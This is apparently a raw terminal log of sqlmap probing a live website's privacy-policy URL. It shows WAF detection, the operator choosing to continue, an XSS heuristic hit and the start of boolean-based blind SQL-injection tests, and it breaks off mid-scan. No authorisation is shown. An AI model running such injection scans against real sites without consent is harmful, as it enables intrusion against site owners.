https://www.creepypasta.com/privacy-policy/
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.8.13#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:39:40 /2019-08-26/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[13:39:40] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2010012717 Firefox/2.0.0.14' from file '/root/sqlmap/data/txt/user-agents.txt'
[13:39:41] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[13:39:42] [INFO] testing connection to the target URL
[13:39:45] [INFO] checking if the target is protected by some kind of WAF/IPS
[13:39:49] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[13:39:49] [WARNING] please consider usage of tamper scripts (option '--tamper')
[13:39:49] [INFO] testing if the target URL content is stable
[13:39:52] [INFO] target URL content is stable
[13:39:52] [INFO] testing if URI parameter '#1*' is dynamic
sqlmap got a 301 redirect to 'https://www.creepypasta.com/privacy-policy/4409/'. Do you want to follow? [Y/n] Y
[13:39:56] [WARNING] URI parameter '#1*' does not appear to be dynamic
[13:40:00] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[13:40:04] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[13:40:05] [INFO] testing for SQL injection on URI parameter '#1*'
[13:40:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:40:08] [WARNING] reflective value(s) found and filtering out
